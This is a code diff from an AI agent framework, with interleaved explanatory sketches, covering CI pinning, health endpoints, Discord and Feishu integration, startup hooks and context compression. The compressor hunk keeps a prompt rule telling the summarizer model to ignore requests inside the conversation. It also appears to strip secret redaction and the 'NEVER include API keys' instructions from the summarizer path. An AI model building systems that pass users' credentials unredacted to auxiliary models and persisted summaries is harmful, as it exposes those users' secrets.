timeout-minutes: 10
steps:
- name: Checkout code
uses: actions/checkout@v4
uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
- name: Install system dependencies
run: sudo apt-get update && sudo apt-get install -y ripgrep
- name: Install uv
uses: astral-sh/setup-uv@v5
uses: astral-sh/setup-uv@d4b2f3b6ecc6e67c4457f6d3e41ec42d3d0fcb86 # v5
- name: Set up Python 3.11
run: uv python install 3.11
@@ -49,10 +52,10 @@ jobs:
timeout-minutes: 10
steps:
- name: Checkout code
uses: actions/checkout@v4
uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
- name: Install uv
uses: astral-sh/setup-uv@v5
uses: astral-sh/setup-uv@d4b2f3b6ecc6e67c4457f6d3e41ec42d3d0fcb86 # v5
- name: Set up Python 3.11
run: uv python install 3.11
+1
@@ -112,6 +112,7 @@ _API_KEY_PROVIDER_AUX_MODELS: Dict[str, str] = {
# "exotic provider" branch checks this before falling back to the main model.
_PROVIDER_VISION_MODELS: Dict[str, str] = {
"xiaomi": "mimo-v2-omni",
"zai": "glm-5v-turbo",
}
# OpenRouter app attribution headers
+6 -17
@@ -28,7 +28,6 @@ from agent.model_metadata import (
get_model_context_length,
estimate_messages_tokens_rough,
)
from agent.redact import redact_sensitive_text
logger = logging.getLogger(__name__)
@@ -271,15 +270,11 @@ class ContextCompressor(ContextEngine):
Includes tool call arguments and result content (up to
``_CONTENT_MAX`` chars per message) so the summarizer can preserve
specific details like file paths, commands, and outputs.
All content is redacted before serialization to prevent secrets
(API keys, tokens, passwords) from leaking into the summary that
gets sent to the auxiliary model and persisted across compactions.
"""
parts = []
for msg in turns:
role = msg.get("role", "unknown")
content = redact_sensitive_text(msg.get("content") or "")
content = msg.get("content") or ""
# Tool results: keep enough content for the summarizer
if role == "tool":
@@ -300,7 +295,7 @@ class ContextCompressor(ContextEngine):
if isinstance(tc, dict):
fn = tc.get("function", {})
name = fn.get("name", "?")
args = redact_sensitive_text(fn.get("arguments", ""))
args = fn.get("arguments", "")
# Truncate long arguments but keep enough for context
if len(args) > self._TOOL_ARGS_MAX:
args = args[:self._TOOL_ARGS_HEAD] + "..."
@@ -358,11 +353,7 @@ class ContextCompressor(ContextEngine):
"assistant that continues the conversation. "
"Do NOT respond to any questions or requests in the conversation — "
"only output the structured summary. "
"Do NOT include any preamble, greeting, or prefix. "
"NEVER include API keys, tokens, passwords, secrets, credentials, "
"or connection strings in the summary — replace any that appear "
"with [REDACTED]. Note that the user had credentials present, but "
"do not preserve their values."
"Do NOT include any preamble, greeting, or prefix."
)
# Shared structured template (used by both paths).
@@ -403,7 +394,7 @@ class ContextCompressor(ContextEngine):
[What remains to be done — framed as context, not instructions]
## Critical Context
[Any specific values, error messages, configuration details, or data that would be lost without explicit preservation. NEVER include API keys, tokens, passwords, or credentials — write [REDACTED] instead.]
[Any specific values, error messages, configuration details, or data that would be lost without explicit preservation]
## Tools & Patterns
[Which tools were used, how they were used effectively, and any tool-specific discoveries]
@@ -446,7 +437,7 @@ Use this exact structure:
prompt += f"""
FOCUS TOPIC: "{focus_topic}"
The user has requested that this compaction PRIORITISE preserving all information related to the focus topic above. For content related to "{focus_topic}", include full detail — exact values, file paths, command outputs, error messages, and decisions. For content NOT related to the focus topic, summarise more aggressively (brief one-liners or omit if truly irrelevant). The focus topic sections should receive roughly 60-70% of the summary token budget. Even for the focus topic, NEVER preserve API keys, tokens, passwords, or credentials — use [REDACTED]."""
The user has requested that this compaction PRIORITISE preserving all information related to the focus topic above. For content related to "{focus_topic}", include full detail — exact values, file paths, command outputs, error messages, and decisions. For content NOT related to the focus topic, summarise more aggressively (brief one-liners or omit if truly irrelevant). The focus topic sections should receive roughly 60-70% of the summary token budget."""
try:
call_kwargs = {
@@ -469,9 +460,7 @@ The user has requested that this compaction PRIORITISE preserving all informatio
# Handle cases where content is not a string (e.g., dict from llama.cpp)
if not isinstance(content, str):
content = str(content) if content else ""
# Redact the summary output as well — the summarizer LLM may
# ignore prompt instructions and echo back secrets verbatim.
summary = redact_sensitive_text(content.strip())
summary = content.strip()
# Store for iterative updates on next compaction
self._previous_summary = summary
self._summary_failure_cooldown_until = 0.0
+21 -3
@@ -8631,6 +8631,24 @@ class HermesCLI:
self._should_exit = True
event.app.exit()
_modal_prompt_active = Condition(
lambda: bool(self._secret_state or self._sudo_state)
)
@kb.add('escape', filter=_modal_prompt_active, eager=True)
def handle_escape_modal(event):
"""ESC cancels active secret/sudo prompts."""
if self._secret_state:
self._cancel_secret_capture()
event.app.current_buffer.reset()
event.app.invalidate()
return
if self._sudo_state:
self._sudo_state["response_queue"].put("")
self._sudo_state = None
event.app.invalidate()
return
@kb.add('c-z')
def handle_ctrl_z(event):
"""Handle Ctrl+Z - suspend process to background (Unix only)."""
@@ -8928,9 +8946,9 @@ class HermesCLI:
if cli_ref._voice_processing:
return "transcribing..."
if cli_ref._sudo_state:
return "type password (hidden), Enter to skip"
return "type password (hidden), Enter to submit · ESC to skip"
if cli_ref._secret_state:
return "type secret (hidden), Enter to skip"
return "type secret (hidden), Enter to submit · ESC to skip"
if cli_ref._approval_state:
return ""
if cli_ref._clarify_freetext:
@@ -9173,7 +9191,7 @@ class HermesCLI:
prompt = state.get("prompt") or f"Enter value for {state.get('var_name', 'secret')}"
metadata = state.get("metadata") or {}
help_text = metadata.get("help")
body = 'Enter secret below (hidden), or press Enter to skip'
body = 'Enter secret below (hidden), ESC or Ctrl+C to skip'
content_lines = [prompt, body]
if help_text:
content_lines.insert(1, str(help_text))
+25 -1
@@ -3,11 +3,12 @@ Event Hook System
A lightweight event-driven system that fires handlers at key lifecycle points.
Hooks are discovered from ~/.hermes/hooks/ directories, each containing:
- HOOK.yaml (metadata: name, description, events list)
- HOOK.yaml (metadata: name, description, events list, optional startup_readiness)
- handler.py (Python handler with async def handle(event_type, context))
Events:
- gateway:startup -- Gateway process starts
- gateway:shutdown -- Gateway process is shutting down
- session:start -- New session created (first message of a new session)
- session:end -- Session ends (user ran /new or /reset)
- session:reset -- Session reset completed (new session entry created)
@@ -31,6 +32,26 @@ from hermes_cli.config import get_hermes_home
HOOKS_DIR = get_hermes_home() / "hooks"
def _normalize_startup_readiness(hook_name: str, manifest: dict[str, Any]) -> Optional[dict[str, Any]]:
"""Validate and normalize optional startup readiness metadata."""
readiness = manifest.get("startup_readiness")
if readiness is None:
return None
if not isinstance(readiness, dict):
print(f"[hooks] Ignoring startup_readiness for {hook_name}: expected mapping", flush=True)
return None
check_id = str(readiness.get("id", "")).strip()
if not check_id:
print(f"[hooks] Ignoring startup_readiness for {hook_name}: missing id", flush=True)
return None
return {
"id": check_id,
"required": bool(readiness.get("required", True)),
}
class HookRegistry:
"""
Discovers, loads, and fires event hooks.
@@ -62,6 +83,7 @@ class HookRegistry:
"description": "Run ~/.hermes/BOOT.md on gateway startup",
"events": ["gateway:startup"],
"path": "(builtin)",
"startup_readiness": None,
})
except Exception as e:
print(f"[hooks] Could not load built-in boot-md hook: {e}", flush=True)
@@ -102,6 +124,7 @@ class HookRegistry:
if not events:
print(f"[hooks] Skipping {hook_name}: no events declared", flush=True)
continue
startup_readiness = _normalize_startup_readiness(hook_name, manifest)
# Dynamically load the handler module
spec = importlib.util.spec_from_file_location(
@@ -128,6 +151,7 @@ class HookRegistry:
"description": manifest.get("description", ""),
"events": events,
"path": str(hook_dir),
"startup_readiness": startup_readiness,
})
print(f"[hooks] Loaded hook '{hook_name}' for events: {events}", flush=True)
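Below is a minimal standalone sketch of the `startup_readiness` metadata path. It mirrors two rules from this change. `_normalize_startup_readiness` requires a mapping with a non-empty `id`, and `required` defaults to true. `reset_startup_checks` in `gateway.status` then turns each loaded hook record into a `pending` check keyed by that id. The manifest is written as a Python dict rather than parsed from `HOOK.yaml`. The hook name `warm-cache` and check id `cache-warm` are hypothetical. `pending_checks` is an illustrative helper, and it omits the `detail` and `updated_at` fields that the real status entries carry.

```python
from typing import Any, Optional


def normalize_startup_readiness(hook_name: str, manifest: dict[str, Any]) -> Optional[dict[str, Any]]:
    """Return {"id", "required"} for valid metadata, or None when absent/invalid."""
    readiness = manifest.get("startup_readiness")
    if readiness is None:
        return None  # the hook declares no readiness check
    if not isinstance(readiness, dict):
        print(f"[hooks] Ignoring startup_readiness for {hook_name}: expected mapping")
        return None
    check_id = str(readiness.get("id", "")).strip()
    if not check_id:
        print(f"[hooks] Ignoring startup_readiness for {hook_name}: missing id")
        return None
    # `required` defaults to True when the manifest omits it.
    return {"id": check_id, "required": bool(readiness.get("required", True))}


def pending_checks(hooks: list[dict[str, Any]]) -> dict[str, dict[str, Any]]:
    """Hypothetical helper: build pending checks from loaded hook records."""
    checks: dict[str, dict[str, Any]] = {}
    for hook in hooks:
        readiness = hook.get("startup_readiness")
        if not readiness:
            continue  # e.g. the built-in boot-md hook records None
        checks[readiness["id"]] = {
            "state": "pending",
            "required": readiness["required"],
            "source": hook["name"],
        }
    return checks


manifest = {
    "name": "warm-cache",
    "events": ["gateway:startup"],
    "startup_readiness": {"id": "cache-warm", "required": False},
}
hooks = [
    {"name": "warm-cache", "startup_readiness": normalize_startup_readiness("warm-cache", manifest)},
    {"name": "boot-md", "startup_readiness": None},
]
print(pending_checks(hooks))
# {'cache-warm': {'state': 'pending', 'required': False, 'source': 'warm-cache'}}
```

Keying checks by `id` rather than by hook name means the hook that owns a check can later mark it `ready` or `failed` without knowing where the hook was loaded from.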
+23
@@ -10,6 +10,7 @@ Exposes an HTTP server with endpoints:
- POST /v1/runs — start a run, returns run_id immediately (202)
- GET /v1/runs/{run_id}/events — SSE stream of structured lifecycle events
- GET /health — health check
- GET /health/detailed — rich status for cross-container dashboard probing
Any OpenAI-compatible frontend (Open WebUI, LobeChat, LibreChat,
AnythingLLM, NextChat, ChatBox, etc.) can connect to hermes-agent
@@ -565,6 +566,27 @@ class APIServerAdapter(BasePlatformAdapter):
"""GET /health — simple health check."""
return web.json_response({"status": "ok", "platform": "hermes-agent"})
async def _handle_health_detailed(self, request: "web.Request") -> "web.Response":
"""GET /health/detailed — rich status for cross-container dashboard probing.
Returns gateway state, connected platforms, active agent count, last exit
reason, last status update time, and PID so the dashboard can display full
status without needing a shared PID file or /proc access. No authentication
required.
"""
from gateway.status import read_runtime_status
runtime = read_runtime_status() or {}
return web.json_response({
"status": "ok",
"platform": "hermes-agent",
"gateway_state": runtime.get("gateway_state"),
"platforms": runtime.get("platforms", {}),
"active_agents": runtime.get("active_agents", 0),
"exit_reason": runtime.get("exit_reason"),
"updated_at": runtime.get("updated_at"),
"pid": os.getpid(),
})
async def _handle_models(self, request: "web.Request") -> "web.Response":
"""GET /v1/models — return hermes-agent as an available model."""
auth_err = self._check_auth(request)
@@ -1783,6 +1805,7 @@ class APIServerAdapter(BasePlatformAdapter):
self._app = web.Application(middlewares=mws)
self._app["api_server_adapter"] = self
self._app.router.add_get("/health", self._handle_health)
self._app.router.add_get("/health/detailed", self._handle_health_detailed)
self._app.router.add_get("/v1/health", self._handle_health)
self._app.router.add_get("/v1/models", self._handle_models)
self._app.router.add_post("/v1/chat/completions", self._handle_chat_completions)
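A dashboard in another container could poll `/health/detailed` using only the standard library. The sketch below assumes the API server is reachable at a base URL you supply; it implies no default host or port. It reads only the fields the handler above returns. `fetch_detailed_health` and `summarize_health` are hypothetical helpers, and the sample payload values are made up.

```python
import json
import urllib.request
from typing import Any


def fetch_detailed_health(base_url: str, timeout: float = 3.0) -> dict[str, Any]:
    """GET {base_url}/health/detailed and decode the JSON body."""
    url = base_url.rstrip("/") + "/health/detailed"
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return json.loads(resp.read().decode("utf-8"))


def summarize_health(payload: dict[str, Any]) -> str:
    """Render a one-line status from the fields /health/detailed returns."""
    state = payload.get("gateway_state") or "unknown"
    platforms = payload.get("platforms") or {}
    agents = payload.get("active_agents", 0)
    return f"pid={payload.get('pid')} state={state} platforms={len(platforms)} agents={agents}"


# A payload shaped like the handler's response (values are illustrative).
sample = {
    "status": "ok",
    "platform": "hermes-agent",
    "gateway_state": "starting",
    "platforms": {"discord": {}, "telegram": {}},
    "active_agents": 2,
    "exit_reason": None,
    "updated_at": "2026-04-15T00:00:00Z",
    "pid": 4242,
}
print(summarize_health(sample))  # pid=4242 state=starting platforms=2 agents=2
```

Because the handler falls back to empty values when `read_runtime_status()` returns nothing, a consumer should treat a missing `gateway_state` as "unknown" rather than as an error.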
+69 -25
@@ -1736,46 +1736,90 @@ class DiscordAdapter(BasePlatformAdapter):
async def slash_btw(interaction: discord.Interaction, question: str):
await self._run_simple_slash(interaction, f"/btw {question}")
# Register installed skills as native slash commands (parity with
# Telegram, which uses telegram_menu_commands() in commands.py).
# Discord allows up to 100 application commands globally.
_DISCORD_CMD_LIMIT = 100
# Register skills under a single /skill command group with category
# subcommand groups. This uses 1 top-level slot instead of N,
# supporting up to 25 categories × 25 skills = 625 skills.
self._register_skill_group(tree)
def _register_skill_group(self, tree) -> None:
"""Register a ``/skill`` command group with category subcommand groups.
Skills are organized by their directory category under ``SKILLS_DIR``.
Each category becomes a subcommand group; root-level skills become
direct subcommands. Discord supports 25 subcommand groups × 25
subcommands each = 625 skills — well beyond the old 100-command cap.
"""
try:
from hermes_cli.commands import discord_skill_commands
from hermes_cli.commands import discord_skill_commands_by_category
existing_names = {cmd.name for cmd in tree.get_commands()}
remaining_slots = max(0, _DISCORD_CMD_LIMIT - len(existing_names))
existing_names = set()
try:
existing_names = {cmd.name for cmd in tree.get_commands()}
except Exception:
pass
skill_entries, skipped = discord_skill_commands(
max_slots=remaining_slots,
categories, uncategorized, hidden = discord_skill_commands_by_category(
reserved_names=existing_names,
)
for discord_name, description, cmd_key in skill_entries:
# Closure factory to capture cmd_key per iteration
def _make_skill_handler(_key: str):
async def _skill_slash(interaction: discord.Interaction, args: str = ""):
await self._run_simple_slash(interaction, f"{_key} {args}".strip())
return _skill_slash
if not categories and not uncategorized:
return
handler = _make_skill_handler(cmd_key)
handler.__name__ = f"skill_{discord_name.replace('-', '_')}"
skill_group = discord.app_commands.Group(
name="skill",
description="Run a Hermes skill",
)
# ── Helper: build a callback for a skill command key ──
def _make_handler(_key: str):
@discord.app_commands.describe(args="Optional arguments for the skill")
async def _handler(interaction: discord.Interaction, args: str = ""):
await self._run_simple_slash(interaction, f"{_key} {args}".strip())
_handler.__name__ = f"skill_{_key.lstrip('/').replace('-', '_')}"
return _handler
# ── Uncategorized (root-level) skills → direct subcommands ──
for discord_name, description, cmd_key in uncategorized:
cmd = discord.app_commands.Command(
name=discord_name,
description=description,
callback=handler,
description=description or f"Run the {discord_name} skill",
callback=_make_handler(cmd_key),
)
discord.app_commands.describe(args="Optional arguments for the skill")(cmd)
tree.add_command(cmd)
skill_group.add_command(cmd)
if skipped:
# ── Category subcommand groups ──
for cat_name in sorted(categories):
cat_desc = f"{cat_name.replace('-', ' ').title()} skills"
if len(cat_desc) > 100:
cat_desc = cat_desc[:97] + "..."
cat_group = discord.app_commands.Group(
name=cat_name,
description=cat_desc,
parent=skill_group,
)
for discord_name, description, cmd_key in categories[cat_name]:
cmd = discord.app_commands.Command(
name=discord_name,
description=description or f"Run the {discord_name} skill",
callback=_make_handler(cmd_key),
)
cat_group.add_command(cmd)
tree.add_command(skill_group)
total = sum(len(v) for v in categories.values()) + len(uncategorized)
logger.info(
"[%s] Registered /skill group: %d skill(s) across %d categories"
" + %d uncategorized",
self.name, total, len(categories), len(uncategorized),
)
if hidden:
logger.warning(
"[%s] Discord slash command limit reached (%d): %d skill(s) not registered",
self.name, _DISCORD_CMD_LIMIT, skipped,
"[%s] %d skill(s) not registered (Discord subcommand limits)",
self.name, hidden,
)
except Exception as exc:
logger.warning("[%s] Failed to register skill slash commands: %s", self.name, exc)
logger.warning("[%s] Failed to register /skill group: %s", self.name, exc)
def _build_slash_event(self, interaction: discord.Interaction, text: str) -> MessageEvent:
"""Build a MessageEvent from a Discord slash command interaction."""
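The grouping described in `_register_skill_group` can be sketched without discord.py. In that scheme, nested skills go under their top-level directory and root-level skills become direct subcommands of `/skill`. This sketch is hypothetical and is not `discord_skill_commands_by_category`. It takes skill directories relative to the skills root. It also assumes Discord's limit of 25 options per command level, with category groups and direct subcommands sharing the 25 top-level slots under `/skill`. It gives category groups priority over uncategorized skills, and the real helper may order or truncate differently.

```python
from pathlib import PurePosixPath

MAX_OPTIONS = 25  # assumed Discord limit on options per command or subcommand group


def group_skills(skill_dirs: list[str]) -> tuple[dict[str, list[str]], list[str], int]:
    """Split skill directories (relative to the skills root) into category groups.

    Returns (categories, uncategorized, hidden_count).
    """
    categories: dict[str, list[str]] = {}
    uncategorized: list[str] = []
    for rel in sorted(skill_dirs):
        parts = PurePosixPath(rel).parts
        name = parts[-1]  # the skill's own directory name becomes the subcommand
        if len(parts) >= 2:
            # Nested skills are grouped under their top-level directory.
            categories.setdefault(parts[0], []).append(name)
        else:
            uncategorized.append(name)

    hidden = 0
    # Each category group holds at most MAX_OPTIONS subcommands.
    for cat, names in list(categories.items()):
        if len(names) > MAX_OPTIONS:
            hidden += len(names) - MAX_OPTIONS
            categories[cat] = names[:MAX_OPTIONS]

    # Category groups and uncategorized subcommands share the top-level slots.
    kept: dict[str, list[str]] = {}
    slots = MAX_OPTIONS
    for cat in sorted(categories):
        if slots == 0:
            hidden += len(categories[cat])
            continue
        kept[cat] = categories[cat]
        slots -= 1
    hidden += max(0, len(uncategorized) - slots)
    return kept, uncategorized[:slots], hidden


cats, root, hidden = group_skills(
    ["creative/ascii-art", "media/gif-search", "mlops/training/axolotl", "dogfood"]
)
print(cats)    # {'creative': ['ascii-art'], 'media': ['gif-search'], 'mlops': ['axolotl']}
print(root)    # ['dogfood']
print(hidden)  # 0
```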
+109 -73
@@ -72,7 +72,10 @@ try:
UpdateMessageRequestBody,
)
from lark_oapi.core.const import FEISHU_DOMAIN, LARK_DOMAIN
from lark_oapi.event.callback.model.p2_card_action_trigger import P2CardActionTriggerResponse
from lark_oapi.event.callback.model.p2_card_action_trigger import (
CallBackCard,
P2CardActionTriggerResponse,
)
from lark_oapi.event.dispatcher_handler import EventDispatcherHandler
from lark_oapi.ws import Client as FeishuWSClient
@@ -80,6 +83,7 @@ try:
except ImportError:
FEISHU_AVAILABLE = False
lark = None # type: ignore[assignment]
CallBackCard = None # type: ignore[assignment]
P2CardActionTriggerResponse = None # type: ignore[assignment]
EventDispatcherHandler = None # type: ignore[assignment]
FeishuWSClient = None # type: ignore[assignment]
@@ -169,6 +173,19 @@ _FEISHU_WEBHOOK_BODY_TIMEOUT_SECONDS = 30 # max seconds to read request
_FEISHU_WEBHOOK_ANOMALY_THRESHOLD = 25 # consecutive error responses before WARNING log
_FEISHU_WEBHOOK_ANOMALY_TTL_SECONDS = 6 * 60 * 60 # anomaly tracker TTL (6 hours) — matches openclaw
_FEISHU_CARD_ACTION_DEDUP_TTL_SECONDS = 15 * 60 # card action token dedup window (15 min)
_APPROVAL_CHOICE_MAP: Dict[str, str] = {
"approve_once": "once",
"approve_session": "session",
"approve_always": "always",
"deny": "deny",
}
_APPROVAL_LABEL_MAP: Dict[str, str] = {
"once": "Approved once",
"session": "Approved for session",
"always": "Approved permanently",
"deny": "Denied",
}
_FEISHU_BOT_MSG_TRACK_SIZE = 512 # LRU size for tracking sent message IDs
_FEISHU_REPLY_FALLBACK_CODES = frozenset({230011, 231003}) # reply target withdrawn/missing → create fallback
_FEISHU_ACK_EMOJI = "OK"
@@ -1490,14 +1507,12 @@ class FeishuAdapter(BasePlatformAdapter):
logger.warning("[Feishu] send_exec_approval failed: %s", exc)
return SendResult(success=False, error=str(exc))
async def _update_approval_card(
self, message_id: str, label: str, user_name: str, choice: str,
) -> None:
"""Replace the approval card with a resolved status card."""
if not self._client or not message_id:
return
@staticmethod
def _build_resolved_approval_card(*, choice: str, user_name: str) -> Dict[str, Any]:
"""Build raw card JSON for a resolved approval action."""
icon = "" if choice == "deny" else ""
card = {
label = _APPROVAL_LABEL_MAP.get(choice, "Resolved")
return {
"config": {"wide_screen_mode": True},
"header": {
"title": {"content": f"{icon} {label}", "tag": "plain_text"},
@@ -1510,13 +1525,6 @@ class FeishuAdapter(BasePlatformAdapter):
},
],
}
try:
payload = json.dumps(card, ensure_ascii=False)
body = self._build_update_message_body(msg_type="interactive", content=payload)
request = self._build_update_message_request(message_id=message_id, request_body=body)
await asyncio.to_thread(self._client.im.v1.message.update, request)
except Exception as exc:
logger.warning("[Feishu] Failed to update approval card %s: %s", message_id, exc)
async def send_voice(
self,
@@ -1845,20 +1853,82 @@ class FeishuAdapter(BasePlatformAdapter):
future.add_done_callback(self._log_background_failure)
def _on_card_action_trigger(self, data: Any) -> Any:
"""Schedule Feishu card actions on the adapter loop and acknowledge immediately."""
"""Handle card-action callback from the Feishu SDK (synchronous).
For approval actions: parses the event once, returns the resolved card
inline (the only reliable way to sync all clients), and schedules a
lightweight async method to actually unblock the agent.
For other card actions: delegates to ``_handle_card_action_event``.
"""
loop = self._loop
if loop is None or bool(getattr(loop, "is_closed", lambda: False)()):
if not self._loop_accepts_callbacks(loop):
logger.warning("[Feishu] Dropping card action before adapter loop is ready")
else:
future = asyncio.run_coroutine_threadsafe(
self._handle_card_action_event(data),
loop,
)
future.add_done_callback(self._log_background_failure)
return P2CardActionTriggerResponse() if P2CardActionTriggerResponse else None
event = getattr(data, "event", None)
action = getattr(event, "action", None)
action_value = getattr(action, "value", {}) or {}
hermes_action = action_value.get("hermes_action") if isinstance(action_value, dict) else None
if hermes_action:
return self._handle_approval_card_action(event=event, action_value=action_value, loop=loop)
self._submit_on_loop(loop, self._handle_card_action_event(data))
if P2CardActionTriggerResponse is None:
return None
return P2CardActionTriggerResponse()
@staticmethod
def _loop_accepts_callbacks(loop: Any) -> bool:
"""Return True when the adapter loop can accept thread-safe submissions."""
return loop is not None and not bool(getattr(loop, "is_closed", lambda: False)())
def _submit_on_loop(self, loop: Any, coro: Any) -> None:
"""Schedule background work on the adapter loop with shared failure logging."""
future = asyncio.run_coroutine_threadsafe(coro, loop)
future.add_done_callback(self._log_background_failure)
def _handle_approval_card_action(self, *, event: Any, action_value: Dict[str, Any], loop: Any) -> Any:
"""Schedule approval resolution and build the synchronous callback response."""
approval_id = action_value.get("approval_id")
if approval_id is None:
logger.debug("[Feishu] Card action missing approval_id, ignoring")
return P2CardActionTriggerResponse() if P2CardActionTriggerResponse else None
choice = _APPROVAL_CHOICE_MAP.get(action_value.get("hermes_action"), "deny")
operator = getattr(event, "operator", None)
open_id = str(getattr(operator, "open_id", "") or "")
user_name = self._get_cached_sender_name(open_id) or open_id
self._submit_on_loop(loop, self._resolve_approval(approval_id, choice, user_name))
if P2CardActionTriggerResponse is None:
return None
response = P2CardActionTriggerResponse()
if CallBackCard is not None:
card = CallBackCard()
card.type = "raw"
card.data = self._build_resolved_approval_card(choice=choice, user_name=user_name)
response.card = card
return response
async def _resolve_approval(self, approval_id: Any, choice: str, user_name: str) -> None:
"""Pop approval state and unblock the waiting agent thread."""
state = self._approval_state.pop(approval_id, None)
if not state:
logger.debug("[Feishu] Approval %s already resolved or unknown", approval_id)
return
try:
from tools.approval import resolve_gateway_approval
count = resolve_gateway_approval(state["session_key"], choice)
logger.info(
"Feishu button resolved %d approval(s) for session %s (choice=%s, user=%s)",
count, state["session_key"], choice, user_name,
)
except Exception as exc:
logger.error("Failed to resolve gateway approval from Feishu button: %s", exc)
async def _handle_reaction_event(self, event_type: str, data: Any) -> None:
"""Fetch the reacted-to message; if it was sent by this bot, emit a synthetic text event."""
if not self._client:
@@ -1950,51 +2020,6 @@ class FeishuAdapter(BasePlatformAdapter):
action_tag = str(getattr(action, "tag", "") or "button")
action_value = getattr(action, "value", {}) or {}
# --- Exec approval button intercept ---
hermes_action = action_value.get("hermes_action") if isinstance(action_value, dict) else None
if hermes_action:
approval_id = action_value.get("approval_id")
state = self._approval_state.pop(approval_id, None)
if not state:
logger.debug("[Feishu] Approval %s already resolved or unknown", approval_id)
return
choice_map = {
"approve_once": "once",
"approve_session": "session",
"approve_always": "always",
"deny": "deny",
}
choice = choice_map.get(hermes_action, "deny")
label_map = {
"once": "Approved once",
"session": "Approved for session",
"always": "Approved permanently",
"deny": "Denied",
}
label = label_map.get(choice, "Resolved")
# Resolve sender name for the status card
sender_id = SimpleNamespace(open_id=open_id, user_id=None, union_id=None)
sender_profile = await self._resolve_sender_profile(sender_id)
user_name = sender_profile.get("user_name") or open_id
# Resolve the approval — unblocks the agent thread
try:
from tools.approval import resolve_gateway_approval
count = resolve_gateway_approval(state["session_key"], choice)
logger.info(
"Feishu button resolved %d approval(s) for session %s (choice=%s, user=%s)",
count, state["session_key"], choice, user_name,
)
except Exception as exc:
logger.error("Failed to resolve gateway approval from Feishu button: %s", exc)
# Update the card to show the decision
await self._update_approval_card(state.get("message_id", ""), label, user_name, choice)
return
synthetic_text = f"/card {action_tag}"
if action_value:
try:
@@ -2897,6 +2922,19 @@ class FeishuAdapter(BasePlatformAdapter):
"user_id_alt": union_id,
}
def _get_cached_sender_name(self, sender_id: Optional[str]) -> Optional[str]:
"""Return a cached sender name only while its TTL is still valid."""
if not sender_id:
return None
cached = self._sender_name_cache.get(sender_id)
if cached is None:
return None
name, expire_at = cached
if time.time() < expire_at:
return name
self._sender_name_cache.pop(sender_id, None)
return None
async def _resolve_sender_name_from_api(self, sender_id: Optional[str]) -> Optional[str]:
"""Fetch the sender's display name from the Feishu contact API with a 10-minute cache.
@@ -2909,11 +2947,9 @@ class FeishuAdapter(BasePlatformAdapter):
if not trimmed:
return None
now = time.time()
cached = self._sender_name_cache.get(trimmed)
if cached is not None:
name, expire_at = cached
if now < expire_at:
return name
cached_name = self._get_cached_sender_name(trimmed)
if cached_name is not None:
return cached_name
try:
from lark_oapi.api.contact.v3 import GetUserRequest # lazy import
if trimmed.startswith("ou_"):
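The sender-name cache read by `_get_cached_sender_name` stores `(name, expire_at)` tuples. It evicts an entry lazily, on the first read after the entry expires. The sketch below is a minimal standalone version of that pattern. The `TTLNameCache` class and its injectable `clock` parameter are illustrative additions; the adapter calls `time.time()` directly. The 600-second default reflects the 10-minute cache mentioned in `_resolve_sender_name_from_api`'s docstring, and the ID `ou_example` is made up.

```python
import time
from typing import Callable, Optional


class TTLNameCache:
    """Map sender IDs to display names, expiring entries after `ttl` seconds."""

    def __init__(self, ttl: float = 600.0, clock: Callable[[], float] = time.time) -> None:
        self._ttl = ttl
        self._clock = clock
        self._entries: dict[str, tuple[str, float]] = {}

    def put(self, sender_id: str, name: str) -> None:
        self._entries[sender_id] = (name, self._clock() + self._ttl)

    def get(self, sender_id: Optional[str]) -> Optional[str]:
        if not sender_id:
            return None
        cached = self._entries.get(sender_id)
        if cached is None:
            return None
        name, expire_at = cached
        if self._clock() < expire_at:
            return name
        # Expired: drop the entry so the next lookup goes back to the contact API.
        self._entries.pop(sender_id, None)
        return None


now = [1000.0]  # fake clock so expiry is deterministic
cache = TTLNameCache(ttl=600, clock=lambda: now[0])
cache.put("ou_example", "Alice")
print(cache.get("ou_example"))  # Alice
now[0] += 601
print(cache.get("ou_example"))  # None
```

A cache-only lookup like this is what lets the synchronous card-action callback pick a display name without awaiting the contact API. When the name is not cached, it falls back to the raw `open_id`.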
+149 -7
@@ -1391,6 +1391,65 @@ class GatewayRunner:
except Exception as e:
logger.debug("Failed interrupting agent during shutdown: %s", e)
async def _notify_active_sessions_of_shutdown(self) -> None:
"""Send a notification to every chat with an active agent.
Called at the very start of stop(), while adapters are still connected, so
messages can be delivered. Best-effort: individual send failures are
logged and swallowed so they never block the shutdown sequence.
"""
active = self._snapshot_running_agents()
if not active:
return
action = "restarting" if self._restart_requested else "shutting down"
hint = (
"Your current task will be interrupted. "
"Use /retry after restart to continue."
if self._restart_requested
else "Your current task will be interrupted."
)
msg = f"⚠️ Gateway {action}. {hint}"
notified: set = set()
for session_key in active:
# Parse platform + chat_id from the session key.
# Format: agent:main:{platform}:{chat_type}:{chat_id}[:{extra}...]
parts = session_key.split(":")
if len(parts) < 5:
continue
platform_str = parts[2]
chat_id = parts[4]
# Deduplicate: one notification per chat, even if multiple
# sessions (different users/threads) share the same chat.
dedup_key = (platform_str, chat_id)
if dedup_key in notified:
continue
try:
platform = Platform(platform_str)
adapter = self.adapters.get(platform)
if not adapter:
continue
# Include thread_id if present so the message lands in the
# correct forum topic / thread.
thread_id = parts[5] if len(parts) > 5 else None
metadata = {"thread_id": thread_id} if thread_id else None
await adapter.send(chat_id, msg, metadata=metadata)
notified.add(dedup_key)
logger.info(
"Sent shutdown notification to %s:%s",
platform_str, chat_id,
)
except Exception as e:
logger.debug(
"Failed to send shutdown notification to %s:%s: %s",
platform_str, chat_id, e,
)
def _finalize_shutdown_agents(self, active_agents: Dict[str, Any]) -> None:
for agent in active_agents.values():
try:
@@ -1481,7 +1540,7 @@ class GatewayRunner:
pass
try:
from gateway.status import write_runtime_status
write_runtime_status(gateway_state="starting", exit_reason=None)
write_runtime_status(gateway_state="starting", exit_reason=None, startup_checks={})
except Exception:
pass
@@ -1523,8 +1582,23 @@ class GatewayRunner:
"or configure platform allowlists (e.g., TELEGRAM_ALLOWED_USERS=your_id)."
)
# Discover plugins before hooks so plugin-owned hook bundles can
# participate in this same startup cycle.
try:
from hermes_cli.plugins import discover_plugins
discover_plugins()
except Exception as e:
logger.warning("Plugin discovery during gateway startup failed: %s", e)
# Discover and load event hooks
self.hooks.discover_and_load()
try:
from gateway.status import reset_startup_checks
reset_startup_checks(self.hooks.loaded_hooks)
except Exception as e:
logger.warning("Startup readiness initialization failed: %s", e)
# Recover background processes from checkpoint (crash recovery)
try:
@@ -2018,6 +2092,10 @@ class GatewayRunner:
self._running = False
self._draining = True
